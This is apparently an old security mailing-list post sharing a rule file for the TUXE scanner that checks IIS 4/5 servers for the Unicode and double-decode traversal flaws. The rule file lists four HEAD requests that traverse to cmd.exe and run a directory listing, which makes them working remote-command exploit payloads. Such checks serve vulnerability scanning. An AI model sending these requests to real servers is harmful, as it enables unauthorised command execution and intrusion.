The attached UXE file, for use with TWWSCAN/TUXE Expert Scanner (available from: http://search.iland.co.kr) will scan IIS 4 and 5 servers for the old Unicode vulnerability and the new Filename Decode Error vulnerability. Usage: tuxe target_server port iisuc.uxe Cheers d0gman _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
############################################################################# # # IIS 4 & 5 Unicode Checks # # Checks for old %C1%9C / %C1%1C / %C0%AF bug # Checks for new %252f CGI encoding unicode bug. # # Rule by d0gman # # Usage: tuxe target port iisuc.uxe # ############################################################################# 200 OK-> HEAD: /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\^Old Unicode Check 1; 200 OK-> HEAD: /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\^Old Unicode Check 2; 200 OK-> HEAD: /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\^Old Unicode Check 3; 200 OK-> HEAD: /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\^New Unicode check;